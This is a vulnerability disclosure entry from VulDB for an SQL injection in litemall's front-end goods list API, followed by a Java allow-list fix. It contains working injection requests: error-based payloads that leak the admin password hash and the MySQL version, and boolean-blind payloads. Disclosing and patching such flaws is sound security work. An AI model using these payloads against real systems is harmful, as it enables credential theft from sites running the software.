Submission #811467: linlinjava litemall up to 1.8.0 SQL Injection - information

Title: linlinjava litemall up to 1.8.0 SQL Injection
Description: A critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall) up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection.

IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382), which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list), which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2).

Vulnerable code in WxGoodsController.java:

    @GetMapping("list")
    public Object list(@RequestParam(defaultValue="add_time") String sort,
                       @RequestParam(defaultValue="desc") String order, ...)

LitemallGoodsService.java, lines 121-122:

    if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) {
        example.setOrderByClause(sort + " " + order);
    }

MyBatis mapper:

    order by ${orderByClause}

No @Sort whitelist annotation is applied to WxGoodsController.

PoC 1 - Extract admin password hash from FRONT-END (no admin auth required):

    GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10

Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ'
Admin bcrypt hash leaked from front-end API!

PoC 2 - Extract MySQL version:

    GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc

Response error: XPATH syntax error: '~8.0.45~'

PoC 3 - Boolean-based blind:

    GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc   -> sorted by id
    GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc   -> sorted by name

Different order confirms injection.

Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all.

Reporter: berna ([email protected])
Source: https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
User: berna (UID 97558)
Submitted: 23/04/2026 16:38 (1 month ago)
Moderated: 17/05/2026 11:36 (24 days later)
Status: accepted
VulDB entry: 364396 [linlinjava litemall up to 1.8.0 Front-end WeChat API WxGoodsController.java list SQL Injection]
Points: 20
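The root cause reported above is unvalidated sort/order text reaching a MyBatis ${orderByClause}. The following is an added example, not litemall's own code, of the allow-list check a fix would apply before building the ORDER BY clause; the class name OrderByGuard and the column names in SORTABLE are assumed for illustration.

```java
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Added example (not litemall's own code): allow-list validation of the
 * sort/order query parameters before they are placed into a MyBatis
 * ${orderByClause}. Column names in SORTABLE are assumed for illustration.
 */
public final class OrderByGuard {
    // Assumed sortable columns of the goods table; align with the real schema.
    private static final Set<String> SORTABLE = Set.of("add_time", "retail_price", "name");
    private static final Set<String> DIRECTIONS = Set.of("asc", "desc");
    // Defence in depth: even allow-listed values must look like a plain identifier.
    private static final Pattern IDENT = Pattern.compile("^[A-Za-z_][A-Za-z0-9_]*$");

    /** The vulnerable pattern from the report: raw concatenation into ORDER BY. */
    static String unsafeOrderBy(String sort, String order) {
        return sort + " " + order; // attacker-controlled text reaches ${orderByClause}
    }

    /**
     * Hardened version: returns the clause only when both parts are allow-listed,
     * otherwise throws so the controller can answer 400 Bad Request.
     */
    static String safeOrderBy(String sort, String order) {
        if (sort == null || order == null) {
            throw new IllegalArgumentException("missing sort/order");
        }
        String s = sort.trim();
        String o = order.trim().toLowerCase();
        if (!IDENT.matcher(s).matches() || !SORTABLE.contains(s)) {
            throw new IllegalArgumentException("unsupported sort column");
        }
        if (!DIRECTIONS.contains(o)) {
            throw new IllegalArgumentException("unsupported sort order");
        }
        return s + " " + o;
    }

    public static void main(String[] args) {
        System.out.println(safeOrderBy("add_time", "desc")); // prints: add_time desc
        // The payload shapes from the report are rejected before any SQL is built.
        String[] rejected = {"extractvalue(1,concat(0x7e,version(),0x7e))", "IF(1=1,id,name)"};
        for (String p : rejected) {
            try {
                safeOrderBy(p, "asc");
                System.out.println("ACCEPTED (bug): " + p);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```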
